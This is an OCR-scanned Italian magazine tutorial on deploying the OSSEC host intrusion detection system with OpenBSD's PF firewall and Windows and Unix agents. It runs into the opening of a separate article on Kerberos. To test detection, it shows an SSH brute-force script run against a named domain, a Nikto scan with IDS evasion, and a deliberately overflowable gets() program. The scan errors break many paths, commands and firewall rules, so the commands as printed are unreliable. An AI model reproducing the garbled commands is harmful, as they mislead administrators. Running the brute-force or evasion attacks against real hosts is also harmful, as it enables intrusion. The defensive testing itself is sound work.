al server che ai vari host. 


RE | 


INSTALLAZIONE DEL 
SERVER 
ni 

Nel numero 197 della rivista abbiamo 
‘avuto modo di analizzare l'installazione 
di OpenBSD 4.6. Partiremo pertanto 
da quella nel seguito di questo articolo, 
integrando le opportune modifiche da 
‘apportare al sistema. 


Al momento della scrittura di questo 
articolo, l’ultima versione di OSSEC 
disponibile per il download è la 2.3 repe- 
ribile all'indirizzo www.ossec.net/main/ 
downloads/. 


a . 


Logghiamoci pertanto come root al set- 
ver OpenBSD, scarichiamo e decompri- 
miamo l’archivio di nostro interesse nella 
directory di root di Apache (/var/www, il 
motivo di questa scelta sarà chiaro quan- 
do affronteremo l'installazione dell'inter- 
faccia Web dell'applicativo): 


# cd /var/www/ 

# wget http://www.ossec.net/ > 
files/ossec-hids-2.3.tar.gz 

# tar zxvf ossec-hids-2.3.tar, 
gz 


Avviamo quindi il processo di installazio- 
ne, che commenteremo di seguito in ogni 
singolo punto: 


# cd ossec-hids-2.3/ 
# ./install.sh 


Verrà prima di tutto richiesta la lingua da 
utilizzare per l'installazione; digitiamo “it” 
e diamo Invio. 

Lo script di installazione (di seguito 

‘SDI) si occuperà di fornire un riepilogo 
del sistema, chiedendoci conferma per 
continuare. Diamo semplicemente Invio 
per procedere. 


Da questo punto in poi partiranno una 
serie di domande da parte dello SDI 
volte a definire la tipologia di installazio- 
ne richiesta, eventuali parametri relativi 
alla nostra macchina e le directory dove 
finalizzare il setup. Malgrado questa fase 
‘si spieghi da sola, commenteremo anche 
qui i singoli passaggi: 


Definiamo innanzitutto la tipologia di in- 
‘stallazione tra quelle proposte. Scriviamo 
pertanto “server” e diamo Invio. 
Indichiamo il percorso di installazione 
dell’HIDS. Scriviamo “/var/www/ossec”. 


MIfRSE 


Abilitiamo la notifica degli alert via mail 
rispondendo “s”. 

Inseriamo il nostro indirizzo di posta 
elettronica 

Lo SDA individuerà autonomamente il 
server SMTP relativo alla mail inserita, 
confermiamo l'utilizzo del medesimo 
scrivendo *s”. 

Abilitiamo il controllo di integrità dei file 
(Syscheck) digitando “s”, 

Stesso discorso per il riconoscimento dei 
rootkit (Rootcheck). - 
Attiviamo la risposta attiva (Active Re- 
sponse) rispondendo affermativamente 
all'apposita richiesta ed a quella succes- 
siva relativa alle risposte firewall-drop. 
Definiamo eventuali IP (esclusi i DNS 
primari e secondari, già inclusi) da 
escludere dai controlli. Nel nostro caso, 
volendo monitorare anche i comporta- 
menti interni alla rete, abbiamo risposto 
negativamente. 

Disabilitiamo il Syslog remoto risponden- 
do “n”. 


Il processo di configurazione pre-installa- 
zione è ora concluso. 


Immediatamente l'HIDS offre un riepilogo 
dei file che saranno oggetto di analisi 
sulla macchina entro quale è installato. 

Il processo è totalmente automatizzato 

e lo SDA individua del tutto autonoma- 
mente i file di log di base del sistema, nel 
nostro caso OpenBSD: 


3.6- Imposto la configurazio- 
ne per l’analisi dei seguenti 
logs: 

-- /var/log/messages 

-- /var/log/authlog 

-- /var/log/secure 

-- /var/log/xferlog 

3 /var/log/maillog 

=- /var/www/logs/access log > 
(apache log) 

-- /var/www/logs/error_log > 
(apache log) 


Diamo Invio per dare il via all'effettiva 
compilazione dei sorgenti dell’applica- 
tivo. 

Il processo si esaurirà nel giro di qualche 
minuto. 

Se tutto è andato per il verso giusto 
l'output risultante dello SDA dovrebbe 
essere il seguente: 


ist 
» Configurazione terminata cor- 
rettamente. 

— Per avviare OSSEC 
HIDS: /var/www/ossec/bin/ » 
‘ossec-control start 

= Per arrestare OS- 
SEC HIDS:/var/www/osset/bin/ ‘‘ 
‘bssec-control stop 
- La configurazione può essere 
vista o modificata in /var/ >= 
ww/ossec/etc/ossec.conf 
Grazie per aver scelto OSSEC 
HIDS. 
Ra 


Concludiamo infine l'installazione dell’ap- 
plicativo impostando l’avvio dello stesso 
insieme al sistema operativo, inserendo 
netfile“/ete/re.local” la seguente diret- 
tiva: 


echo “Avvio OSSEC HIDS” 
/vaz/www/ossec/bin/ossec-- 
control start 


RISPOSTA ATTIVA 
E CONFIGURAZIONE 
DI PF 
SLA di 
Installato OSSEC ci preoccuperemo di 
configurare correttamente PF, integran- 
dolo all’HIDS al fine di rendere operativa 
la modalità Active Response dell'appli- 
cativo. 


Nel numero 188 della rivista abbiamo 
avuto modo di affrontare abbastanza 
dettagliatamente l'utilizzo e la configu- 
razione del packet filter di OpenBSD per 
utilizzi generici. In questa sede, partendo 
da quella base, aggiungeremo un'ulterio- 
re necessaria nozione che ci consentirà 
di capire come funziona l’interfacciamen- 
to tra l’HIDS ed OpenBSD. 


Per gestire più istanze singole accor- 
pandole ad un’unica azione, PF offre un 
meccanismo tabellare semplice e per- 
formante. Definendo apposite tabelle di 
indirizzi identificate da un nome univoco, 
è infatti possibile associare particolari 
azioni al blocco di indirizzi identificato 
dalle stesse. 


OSSEC sfrutta proprio questa caratte- 


ristica. Inserendo un’opportuna tabella 
denominata “ossec_fwtable” all’interno 
del file di configurazione del firewall l’ap- 
plicativo si occuperà di riempirla secondo 
lenecessità del caso, andando di volta in 
volta ad inserire quei singoli IP identificati 
quali mittenti degli alert generati e dei 
tentativi di attacco ricevuti. 


PF, matchando semplicemente la tabella, 
imposterà un blocco in uscita ed in entra- 
ta su tutto il gruppo di IP definito. 


Vediamo quindi come istruire il firewall in 

tal senso. Editiamo la configurazione del- 
lo stesso, inserendo nel file “/ete/pf.conf 
le seguenti tre righe: 


table <ossec fwtable> persist 
block in quick from <ossec_ 
£wtable> to any 

block out quick froti any to 
<ossec_fwtable> 

# — 


Non importa la collocazione di questo 
blocco di istruzioni. Questo perché, 
come abbiamo avuto modo di scoprire 
illo tempore, l'utilizzo della direttiva quick 
impone l'esecuzione dell’azione definita 
indipendentemente dall'ordine che que- 
sta assume rispetto alle altre. 


Da questo momento l'HIDS si integrerà 
perfettamente al firewall del sistema. 

l meccanismi di protezione autonoma 
offerti faranno si che l’applicativo, d'ora 
in poi, si configuri esattamente come 
HIPS (Host-based Intrusion Prevention 
System). 


La modalità Active Response di OSSEC 
non si esaurisce al solo inserimento degli 
IP originari degli attacchi nella tabella 
‘appena definita. Essa, di default, per un 
periodo di tempo determinato in fase di 
‘scrittura delle regole dell’HIPS, collo- 
cherà i medesimi IP nel file “hosts.deny” 
del sistema, su OpenBSD come per 

la stragrande maggioranza dei sistemi 
Unix-like, collocato nella directory “etc”. 


AGENTI 
Come abbiamo.esaurientemente spiega- 


to nel corso del numero passato, OSSEC 
colleziona le informazioni ed i log degli 
host della nostra rete attraverso i vari 
agenti installati sulle singole macchine. 


Per funzionare, un agente invia la propria 
chiave di autenticazione al Server che lo 
identifica univocamente. 

Il tool che si occupa della gestione degli 
agenti è “manage_agents”, collocato 
nella directory “/varlwww/ossec/bin/”. 


Vediamo di seguito il procedimento 

per l’inserimento di un singolo agente; 
questo, ovviamente, risulterà invariato 
per ogni ulteriore installazione. In prima 
istanza, una volta avviato il tool, digitiamo 
“A” per aggiungere un nuovo client: 


# /var/www/ossec/bin/manage 
agents 


(A)dd an agent (A). 

(E)xtract key for an > 
agent (E). 

(L)ist already added > 
agents (L). 

(R)emove an agent (R). 

(Quit. 
Choose your action: A,E,L,R or 
Qua 


Saranno quindi richiesti i dettagli relativi 
al nuovo agente (nome, indirizzo IP ed un 
ID numerico). 

Rispondiamo in base alle nostre esigenze 
come di seguito: 


* A name for the new agent: 
PC-Windows1 

* The IP Address of the > 
new agent: 192.168.1.100 

* An ID for the new agent > 
[001]: 001 


Confirm adding it?(y/n): y 


Il tool ritomerà quindi all’interfaccia ini- 
ziale. Stavolta digitiamo “E” per generare 
la chiave di autenticazione per l'agente 
‘appena creato. Anche in questo caso il 
procedimento è guidato: 


Choose your action: A,E,L,R > 
or Q: E 
available agents: 


ID: 001, Name: PC-< 
Windows1, IP: 192.168.1.100 
Provide the ID of the agent > 
to extract the key (or ‘\q" — 
to quit): 001 


Agent key information > 
for ‘001’ is: 
MDAxIFBDLVapb ... 


La chiave appena generata sarà quella di 
volta in volta richiesta in fase di installa- 
zione dell'agente sui vari host della rete. 
Per ogni nuovo client ne genereremo una 
ad hoc. 


WINDOWS AGENTS 


c—_——mÉrm——— 
Per Microsoft Windows l'eseguibile da 
scaricare ed installare lo troviamo all’indi- 
rizzo www.ossec.net/files/ossec-agent- 
Win32-2.3.exe. 

In fase di installazione abilitiamo l’integri- 
ty checking e disabilitiamo il monitoring 
dei log di IIS (fatti salvi i casi in cui vi sia 
effettiva necessità, ad esempio nell’ipote- 
si in cui il nostro host Windows fosse un 
ulteriore od il singolo server web). 
Conclusa l'installazione in classico ed 
inconfondibile stile Microsoft (Avanti, 
Avanti, Fine) si presenterà di fronte ai 
nostri occhi l'Agent Manager. In questa 
‘schermata dovremo inserire l'indirizzo IP 
del server OSSEC e l’Auth Key. 


L’OSSEC Agent Manager su Microsoft 
Windows in fase di abilitazione dell'host 
come Agente dell'HIPS. 

La pressione del tasto Save ed un click 


«su Manage -> Start OSSEC è più che 
‘sufficiente per far sì che l'agente assuma 
vita autonoma. 


Per abilitare l'agente direttamente all’av- 
vio del sistema modifichiamo attraverso 
services.msc il servizio “OSSEC Hids 


Windows Agent” impostando il Tipo di 
Avvio su “Automatico”. 


Abilitiamo l'avvio automatico dell’Agente 
‘modificando l'apposito valore. 


A questo punto la postazione Windows 
appena configurata farà parte della rete 
OSSEC. 

Per testare l'effettiva operatività 
dell'agente, dal server digitiamo: 


# /var/ww/ossec/bin/agent_ > 
control -lc 
OSSEC HIDS agent_control 
List of available agent: 
ID: 000, Name: www. 
gfhome.info (server), IP: > 
127.0.0.1, Active/Local 
ID: 001, Name: PC-Windows1,- 
IP: 192.168.1.100, Active 


UNIX AGENTS 
e sil 
Il procedimento di seguito illustrato 
riguarderà l'installazione dell'agente su 
host Linux, BSD, Solaris e Mac. 
La distro utilizzata in quest'esempio è 
Gentoo. Resta inteso che questo det- 
taglio è di scarso interesse in quanto il 
processo qui descritto sarà lo stesso per. 
qualsiasi distribuzione. 


Il pacchetto da scaricare sarà quello 
usato in fase di installazione del server. 
Semplicemente, appena richiesto, defini- 
remo come “agent” il tipo di installazione 
desiderata: 


[root@pluto -]#.wget http:// 
© www.ossec .net/files/ossec-7 
hids-2.3.tarigz 

[root@pluto -]# tar zxvf > 
ossec-hids-2,3.tar.gz 
[root@pluto -]# cd ossec-; 
hids-2.3/ 

[root@pluto ossec-hids-2.3]# 
“./install.sh 


Come fatto per il server selezioniamo 
l'italiano come lingua per l'installazione e 
procediamo. 

Commenteremo di seguito ogni singolo 
passaggio dell'installazione: 


Digitiamo “agent” alla richiesta del tipo di 
installazione da effettuare. 

Stavolta definiamo “/var/ossec” la direc- 
tory entro cui installare l'agente. 
Inseriamo l'indirizzo IP del server OSSEC 
(nel nostro caso 192.168.1.10). 

Attiviamo syscheck, rootcheck ed 

Active Response digitando “s” a tutte le 
richieste. 

Diamo invio per concludere la configura- 
zione e dare inizio alla compilazione. 


Dopo qualche istante, a compilazione 
completata, dovremmo ricevere in output 
le seguenti informazioni relative all’instal-. 
lazione appena effettuata: 


- Configurazione terminata cor- 
rettamente. 

- Per avviare OSSEC HIDS: /var> 
/ossec/bin/ossec-control start 
- Per arrestare OSSEC HIDS: > 
/var/ossec/bin/ossec-control 
stop 

- La configurazione può essere 
vista o modificata in /var/ © 
ossec/etc/ossec. conf 

Grazie per aver scelto OSSEC 
HIDS. 


Impostiamo quindi l'avvio dell'agente al 
boot inserendo “/var/ossec/bin/ossec- 
control start” nell’apposito file di init della 
nostra distribuzione. 


Installato l'agente sull'host generiamo, 
come visto prima, un'ulteriore chiave di 
‘autenticazione per il Client appena con- 
figurato. Fatto questo, abilitiamo l'host 


utilizzando anche sull'agente “mana- 
ge agents”: 


[root@pluto ossec-hids-2.3]# /\var/ossec/ 
bin/manage agents 

(T)mport key from the > 

server (I). 

(Quit. 

Choose your action: I or Q1.I 


Paste it here (or ‘\q’ to > 
quit): MDAYIFBDLUxpbnV4MSAx... 


Confirm adding it?(y/n): y 
Added. 


Avviamo pertanto il Client: 


Iroot@pluto.ossec-hids-2.3]# > 
Ivar/ossec/bin/ossec-- 

control start 

Starting OSSEC RIDS v2.3 > 

(by Trend Micro Inc.)... 
Started ossec-execd... 
Started ossec-agentd... 
Started ossec-logcollector... 
Started ossec-syscheckd... 
Completed. 


Dal server testiamo, infine, l'operatività 
dell'agente: 


# /var/www/ossec/bin/agent_ > 
control -lc 

OSSEC HIDS agent _control. > 
List of available agents: 

ID: 000, Name: www.gfhome.- 
info (server), IP: 127.0.0.1, >» 
Active/Local 

ID: 001, Name: PC-Windows1, = 
IP: 192.168.1.100, Active 

ID: 002, Name: PC-Linux1, 
IP: 192.168.1.132, Active 


Ripetendo sia il procedimento illustrato 
qui che quello per Agenti Windows, 
metteremo via via tutti i nostri host sotto 
l'occhio vigile di OSSEC. 


OSSECWUI 


Leggere gli alert via posta elettronica e 
via terminale farà sicuramente molto nerd 
ma nel caso di reti complesse e carat- 
terizzate dalla presenza di innumerevoli 


host non è decisamente la scelta più 
comoda. 


Avere l'opportunità di utilizzare un’inter- 
faccia che riassuma lo stato del network 
ci risparmierà indubbiamente molto 
tempo, consentendoci, peraltro, di avere 
un quadro d'insieme della situazione ag- 
giornato in tempo reale e visibile in ogni 
parte del globo. 


Seguendo quindi la roadmap prefissata, 
occupiamoci di installare il frontend web 
di OSSEC sfruttando Apache. 


| più attenti si ricorderanno che OpenB- 
SD gestisce Apache in un ambiente 
totalmente isolato dal resto del sistema 
(chroot). Da qui, piuttosto che utilizzare 
un numero considerevole di link simbo- 
lici, abbiamo preferito installare OSSEC 
direttamente nella root del server Web (/ 
var/www). 

Questo ci permetterà di rendere l'instal- 
lazione della WUI molto più snella, non 
‘dovendoci preoccupare dell’impossibilità 
da parte di Apache di accedere a directo- 
ry esteme al suo environment di lavoro. 


Scarichiamo quindi il tarball dell’interfac- 
cia Web (al momento della scrittura di 
questo articolo giunta alla versione 0.3) 
ed installiamola sul Server: 


# cd /var/www/htdocs/ 

# wget http://www.ossec.net/fi > 
les/ui/ossec-wui-0.3.tar.gz 

# tar zxvf ossec-wui-0.3.tar.gz 


Avviamo lo script di setup per impostare 
‘autenticazione richiesta quando acce- 
diamo alle pagine della WUI: 


# cd ossec-wui-0.3 

# ./setup.sh 

Setting up ossec ui... 
Username: giovanni 

New password: 

Re-type new password: 

Adding password for user > 
giovanni 

Setup completed successfuly. 
Modifichiamo ora il file di configurazione 
(ossec_conf.php), indicando il percorso 


di OSSEC che nel nostro caso sarà, pro- 
prio per le constatazioni relative all'am- 


biente chroot fatte prima, “/ossec”. 

Viste le nostre necessità la restante parte 
della configurazione è più che sufficiente: 
la lasceremo pertanto invariata. In defi- 

nitiva il file dovrà risultare così: 


Un rapido collegamento con un qualun- 
que browser al server web (nel nostro 
caso 192.168.1.10) all'indirizzo http://-/ 
ossec-wui-0.3/index.php ci confermerà 
immediatamente la riuscita dell’instal- 


lazione. 


ie della WUI ci mostra un rie- 


L'homepag 
pilogo degli ultimi eventi e log ana 
e dei file modificati (integrity 


La struttura della WUI è piuttosto sem- 
plice. Essa si avvale di un’interfaccia 
suddivisa in 5 schede: Main, Search, 
Integrity checking, Stats, About. 
Escludendo l’ultima, ognuna di queste 
offre preziose informazioni relative ai 
dati raccolti da OSSEC e dai vari agenti 
nella nostra rete. 


Nella home è proposto un quadro d'in- 
sieme dove sono visualizzati gli ultimi 
alert, la lista degli agenti attivi disponi- 
bili e gli ultimi file modificati (integrity 
check). 

Su quest'ultimo punto spenderemo 
qualche parola. Durante il processo di 
installazione degli agenti e del server 
stesso, i file “caldi” del sistema sono 
tutti firmati digitalmente dall’applicati- 
vo. In sostanza è generata una coppia 
di hash (SHA1 ed MD5) associata ai 
singoli file predetti che li identifica in 
modo univoco insieme al loro conte- 
nuto. 
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La modifica di questi ultimi, volontaria 
o meno che sia (si pensi ad esempio 
per Windows all'operato di trojan, virus, 
etc. e per Linux a backdoor, exploit et 
similia), determinerà necessariamente 
la generazione di un hash diverso, evi- 
denziando l'avvenuto cambiamento. 


E proprio su questo elementare pre- 
supposto che si basa il controllo di 
integrità (integrity checking) condotto 
da OSSEC. 


Nell'esempio proposto in figura, rela- 
tivo alla scheda “Integrity checking” 
della WUI, possiamo appunto osser- 
vare il checksum fatto al primo avvio 
dall’agente ospitato sul PC montante 
Microsoft Windows. 


A sinistra è indicato il file monitorato, al 
centro è possibile visualizzare la coppia 
di hash associata allo stesso ed a de- 
stra la dimensione. 


Il controllo di integrità dei file analizzati 


Jall”: 
dall 


gente montato su Win 


In caso di modifica degli stessi, natural- 
mente, sarà generato un apposito alert 
informativo. Anche se la probabilità di 
falsi positivi in questo contesto è molto 
alta, è sempre auspicabile prestare par- 
ticolare attenzione a questo genere di 
alert in quanto potrebbe rappresentare, 
con buona approssimazione, un primo 
campanello di allarme circa la compro- 
missione del nostro host da parte di 
malware generico. 


La scheda “Stats” ci offre in una singola 
‘schermata le statistiche degli alert 
generati dall'HIPS suddivise per livelli, 
regole ed orari. Rappresenta pertanto, 
indubbiamente, un ottimo strumento per 
avere una visione d'insieme della situa- 
zione del nostro network in tempo reale. 


e gene 


Infine, nella scheda “Search”, è possibile 
ricercare singoli eventi ed alert generati. 
Nell'esempio proposto in figura abbiamo 
focalizzato la nostra attenzione su SSH. 


inalità di ricerca consente di 
unicamente gli alert di nostro 


CIA SS 
CIAK, AZIONE! 


Dopo questo excursus tra configurazio- 
ni ed installazioni è giunto il momento 

di testare sul campo l’affidabilità della 
soluzione OSSEC. Fedelmente a quanto 
analizzato nel corso dell'intero articolo 
effettueremo alcuni attacchi contemplati 
dalle regole analizzate. 


Oggetto di nostro interesse in questa 
sede saranno pertanto i riscontri ai 
seguenti: 


Tentativi di accesso non autorizzati (di 


seguito TANA) su protocollo SSH. 
Scanning effettuati con Nikto a website e 
web apps. 

Segfault di applicativi su Windows. 
Controlli di integrità su Windows. 


Per ognuno dei punti succitati analizze- 
remo il comportamento di OSSEC con- 
statando anche come l'operato di Active 
Response stronchi sul nascere qualsiasi 
tentativo di attacco ai sistemi, coordinan- 
dosi in modo perfettamente autonomo 
con PF ed OpenBSD. 


elimini 
1 - TANA SU 

PROTOCOLLO SSH 

SORTI TENENTE TY FIDI TM 
Per testare il comportamento di OSSEC 
in caso di attacchi brute force al proto- 
collo SSH utilizzeremo uno dei tantissimi 
script disponibili online: mtsshbrute.py 
che trovate disponibile per il download 
sul nostro sito. 


Lo script, scritto in python, consente di 
inoltrare multiple richieste di accesso 
in base ad utenti e password definite in 
appositi file che fungono da dizionario. 
Supportando il threading inoltre ci con- 
sente di velocizzare di molto l'operato. 


Avviamo pertanto lo script come di 
seguito: 


$ python mtsshbrute.py -H m0le.-= 
it -p 22 -U users.txt -P\ 
dizionario.txt -T 2 

[*] SSH Brute Force Ninja 

[*] 1 user(s) loaded. 

[*] 10 password(s) loaded. 

[*] Brute Force started. 

[*] Done. 


Osserviamo quindi il comportamento 
dell'HIPS. 

Come ci aspettavamo la generazione 
degli alert (via terminale, mail e WUI) ci 
informa puntualmente dell'accaduto: 


** Alert 1269215496.1998: mail > 
- syslog,sshd,authentication_ > 
failures, 

2010 Mar 22 17:13:30 www->/ > 
var/log/authlog 

Rule: 5720 (level 10) -> ‘Mul 

v tiple SSHD authentication + 


failures.’ 

Src IP: 93.42.111.226 

User: root 

Mar 21 17:13:30 www sshd[3094]:> 
Failed password fotroot from > 
93,42.111.226 port 26991 ssh2 
Mar 21 17:13:29 www > 
sshd[11785]: Failed password 
for root from 93.42.111.226 » 
port 35545 ssh2 


Un tipico esempio di avviso offerto 
dall'interfaccia web di OSSEC. 


Dopo poco, inoltre, la modalità A.R. si 
preoccupa di bloccare in modo definitivo 
l'IP che origina l'attacco aggiungendolo 
nel file hosts.deny e nella tabella ossec_ 
fwtable di PF: 


# tail -f /var/wmw/ossec/ > 
logs/active-responses.log 

Sun Mar 21 17:13:30 CET > 

2010 .../host-deny.sh add > 
93.42.111.226 1269188010. > 
38989 5720 

Sun Mar 21 17:13:30 CET > 

2010 .../firewall-darop.sh add 

> 93.42.111.226 1269188010, > 
38989 5720 


# pfctl -t ossec_fwtable -- 
T show 
93.42.111.226 


# cat /etc/hosts.deny 
ALL:93.42,111.226 


2 - WEB SERVER 
SCANNING 
[ csonceni 
In questo caso utilizzeremo Nikto per 
analizzare il web server da remoto speci- 
ficando come parametro di avvio l’abilita- 
zione delle tecniche di IDS evasion: 


# ./nikto.pl -evasion 1 -h > 


mOle.it 


Celermente il sistema di alerting ci 
notifica svariati errori riscontrati nel 
file di log degli accessi di Apache: 


Rule: 31151 fired (level 10 
©) -> “Mutiple web server 
400 —> error codes from same 
= source ip.” 

Portion of the log(s): 
93.42.,111.226 - [22/ =» 
Mar/2010:01:06:15 +0100] *: 
“GET /£S£6Npjt.dat HTTP/ 
1,0” 404 206 

93.42.111,226 - [22/ > 
Mar/2010:01:27:;14 +0100) -= 
“GET /£Sf6Npjt/ HTTP/1.04- 
404 203 

93.42.111.226 - [22/ = 
Mar/2010:01:27:14 +0100] > 
NGET /£Sf6Npit.Uploadservlet 
“ HTTP/1.0”. 404 216 


Interessante constatare che, qualora 
avessimo Mod_Security abilitato, 
non mancherebbero avvisi relati- 

vi anche a quest'ultimo, come di 
seguito: 


2010 Mar 22 01:06:02 www->/ 
"_var/www/logs/error_log 
Rule: 30118 (level 6) -> > 
‘Access attempt blocked by > 
Mod Security.’ 

[Mon Mar 22 01:06:01 -= 

2010] [error] [client 
93.42.111.226] mod_security: 


Dopo il chiasso fatto da Nikto, arriva 
puntuale come sempre la risposta 
CORIGUEUR 


# tail -f /var/wm/ossec/ > 
logs/active-responses.log 
Mon Mar 22 01:06:15 CET > 
2010 .../host-deny.sh add -> 
93.42.111.226 1269216362. > 
4217 30118 

Mon Mar 22 01:06:16 CET 
2010» .../firewall-drop. 

sh add - - 93.42.111.226 
1269216362. — 4217 30118 


# pfctl -t ossec_fwtable -— 
=T show 
93,42,111,226 


# cat /etc/hosts.deny 
ALL:93.42.111.226 


3 - SEGFAULT 
SU MICROSOFT 
WINDOWS 
ne 
In questa circostanza osserveremo il 
‘comportamento di OSSEC quando un 
agente-(in questo caso quello collo- 
cato sul PC montante Windows) invia 
informazioni relative a processi ed 
eventi dell'host entro cui è attivo. 
Simuleremo pertanto un crash di un 
generico applicativo suscettibile ai 
Buffer Overflow vedendo come l’HIPS 
intercetti l'apposito evento generato 
come Windows Event Log dal sistema 
immediatamente dopo il segfault. 


Per far ciò utilizzeremo un banale 
sorgente che si commenta da solo (0 
almeno si spera), scritto per lo scopo: 


#include <stdio.h> 
main() { 

char buf[3]; 
gets(buf); 

return 0; 

} 


Compiliamo, avviamo ed inseriamo 
qualche carattere in più per constatare 
l'effettivo crash del “programma”. 
Un'occhiata agli alert ci riconfermerà 
la meticolosità di OSSEC: 


2010 Mar 22 01:40:11 (PC-- 
Windows1) 192.168.1.100-- 
>WinEvt Log 

WinEvtLog: Application: 
ERROR(1000): Application Er- 
ror: (no user): no domain: 
XX: Nome dell’applicazio- 
ne che ha generato l’erro- 
re: bof.exe, ... timestamp: 
0x4ba61368 Nome del modulo 
che ha generato l'errore: 
timestamp: 0x00000000 Codice 
eccezione: 0xc0000005 Offset 
errore 0x61616161 


L'inserimento di una stringa eccedente la 
dimensione del buffer causa, inevitabil- 
mente, il crash del programma. 


4 - INTEGRITY 
CHECKING 
cei 
Dal momento che Windows si presta 
bene ai nostri scopi esemplificativi, 
il nostro punto di riferimento sarà 
‘anche in questo caso l'agente “PC- 
Windows1”. 


Replicando il comportamento di un 
generico malware vedremo, operati- 
vamente, in cosa consiste il controllo 
di integrità condotto dall'HIPS, ana- 
lizzando, come fatto finora, un alert 
generato. 


La prima cosa che ci viene in mente 
di fare è modificare un file di sistema 
andandone a variare il checksum 
storicizzato da OSSEC in fase di 
primo avvio dell'agente. 


Di seguito quindi l'immediato riscon- 
tro offerto dopo averne editato a 
mano uno a caso: “C:\Windows\win. 
ini”: 

Integrity checksum changed > 
for: ‘C:\Windows/win.ini” 
Size changed from ‘403’ to = 
‘409’ 

Ola md5sum was: ‘£3cb8893d4927 
> cb8edeee792928ecd1c9' 

New md5sum is : ‘40f1bb10£0 
> £c378289c3aaa722fb6d49” 
Ola shaisum was: ‘24b0c156297 
> 4b4101304e51a60554623- 
b000a65d” 

New shalsum is : ‘24c15861a4 
“ e25e34013ffc7£38£8b2£bc8- 
df£6be8” 


Il discorso è del tutto simile, ovvia- 
mente, per eventuali variazioni al 
registro di sistema. 

Lasciamo al lettore le prove del caso. 


CONCLUSIONI 

E RIFERIMENTI 

e 
Appaiono evidenti le avanzate caratteri- 
stiche e peculiarità offerte dall’applicativo 
in qualunque contesto operativo; di gran 
lunga alla pari, se non migliori, rispetto 
alle alternative commerciali generalmente 
‘adoperate in contesti enterprise. 


Risulterà quindi quasi scontato capire 
che, malgrado il discorso intrapreso 
sulla rivista sia stato pensato per offrire 
un quadro dell'HIDS quanto più esteso 
possibile, la quantità di azioni e processi 
gestibili da OSSEC è talmente notevole 
da rendere anche la nostra trattazione 
limitativa. 


Come abbiamo avuto modo di segnala- 
re, la documentazione è davvero tanta 
così come altrettanto grosse sono le 
possibilità offerte dalla suite. Anche qui, 
quindi, segnaliamo alcuni riferimenti, da 
intendersi come complementari a quelli 
già offerti nella prima parte di questo 
articolo. 


Non ci resta che augurarvi buon diverti- 
mento e buona sperimentazione! 


sosssese 


RIFERIMENTI 


: Website relativi agli applicativi analizzati: 


OpenBSD PF: www.openbsd.org/faq/pf/ 


Nikto: cirt.net/nikto2 
Mod_ Security: modsecurity.org 


Alcune riferimenti online utili: 


Buffer Overflow: www.siforge.org/ 
articles/2003/04/15-bofexp.html 


Buffer Overflow (2): www.owasp.org/ 
index.php/Buffer_Overflow 


2 Ulteriori riferimenti: 


Hacker Journal nr, 195 
“Buffer Overflow” 


ersersoscecorcose 


Hi agi 


UREZZA/MEDIO 


idiflLuca:Buti WA 
Aia SCA cournalit 7° 


“Cerbero, fiera 
crudele e diversa,\ 
con tre gole 
caninamente 
latra\ sovra la 
gente che quivi 

è sommersa.\ Li ce; 
occhi ha vermigli, “a 
la barba unta e 

atra\ e ‘l ventre 

largo, e unghiate 

le mani;\ graffia li 

spirti ed iscoia ed 

isquatra.” 


HACKER JOURNAL 39 


SICURE 


Sie 


uesto passo, tratto 
dal quarto canto della 
Divina Commedia di 
Dante, descrive Cerbero, 
in inglese Kerberos, 
il mitico cane a tre teste pena dei 
golosi. 
Nel campo dell'informatica, questa 
bestia mitologica è stata utilizzata 
come nome e simbolo di un noto 
protocollo per l'autenticazione 
dei servizi di rete, il Kerberos, 
contraddistinto da un'architettura 
definita three-sided. Questo termine 
significa che il protocollo utilizza tre 
componenti per raggiungere il suo 
obiettivo di spedizione affidabile 
dei dati attraverso una rete: uno 
di essi è il client, che rappresenta 
l'utente, il secondo è il server, al 
quale si richiede l’accesso ed il terzo 
è un contenitore delle informazioni 
riguardanti le chiavi d'accesso. 
Per comprendere meglio come 
funziona il sistema, dobbiamo 
tornare indietro negli anni ‘80, 
quando Kerberos venne creato nei 
laboratori del Massachusetts Institute 
of Technology, probabilmente 
il più famoso centro di ricerca 
tecnologica del mondo. A quei 
tempi l'autenticazione degli utenti, 
necessaria per fornire servizi di rete, 
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avveniva attraverso la richiesta e 
l'invio di username e password, ed il 
suo trasporto era “in chiaro”. Questo 
significa che era possibile, e per 
alcuni servizi lo è ancora, carpire le 
password spedite semplicemente 
“ascoltando” lo scambio di dati tra 
server ed utente. 

Per alcuni servizi, come il classico 
telnet, le password sono spedite 
‘ancora senza nessun algoritmo di 
crittografia, rendendo il loro uso 
altamente sconsigliato in ambiti 

nei quali la sicurezza è necessaria. 
L'operazione di ascolto di un traffico 
di rete si chiama packet sniffing, ed è 
talmente facile da sfruttare che anche 
una persona poco esperta e male 
intenzionata potrebbe farne uso. 


CHIAVI DI 
CRITTOGRAFIA 


Una soluzione molto utilizzata 

per risolvere il problema è l'uso 

di protocolli sicuri che sfruttino lo 
scambio di chiavi di crittografia e 
spediscano i dati in maniera cifrata, 
come per esempio fa ssh. 

Nei laboratori del MIT si studiò un 
sistema in grado di permettere lo 
scambio sicuro delle informazioni 


A - Y, 


di autenticazione per vanificare 
eventuali tentativi di ascolto del 
traffico, allo scopo di ottenere dati di 3 
accesso validi. Per funzionare, come 
abbiamo già accennato, Kerberos 
utilizza tre componenti, client, server 
e KDC (Key Distribution Center). 
All'atto dell’autenticazione è richiesto 
un Ticket, una sorta di biglietto 
d’entrata che permette l’accesso 

‘al servizio per una sessione ad un 
determinato utente. Quando un 
utente cerca di connettersi ad una 
workstation che sfrutta una rete 
autenticata con Kerberos, viene 
inviato un messaggio al KDC che 
richiede un TGT (Ticket Granting 
Ticket), un biglietto che permette 

di ottenere altri ticket senza doverli 
richiedere nuovamente al KDC. 

Il messaggio inviato contiene il 
Principal, che è un utente o un 
servizio che può essere autenticato 
tramite Kerberos ed ha l’identificativo 
in questa forma: 


Il Realm è la definizione nella 
terminologia di Kerberos di una rete 
basata su questo sistema. Esso può 
essere costituito da più KDC e da un 
insieme arbitrario di client e server. 


Il Kdc controlla l’esistenza del principal 
nel suo database, e, nel caso riesca a 
trovarlo, prepara un Tgt cifrandolo con 
la chiave dell’utente ed inviandolo a chi 
ne ha fatto richiesta. A questo punto il 
client decifra il Tgt utilizzando la chiave 
dell'utente, ricavata dalla password 
inserita, e la memorizza per un tempo 
variabile e limitato, durante il quale 
l'utente non ha solitamente bisogno di 
reinserire la sua password. 

Quando l'utente ha bisogno di 
autenticarsi per un servizio, il client 
richiede al Ticket Granting Service 

il ticket utilizzando il biglietto Tgt. 
Spesso il Kde ed il Tgs coincidono 

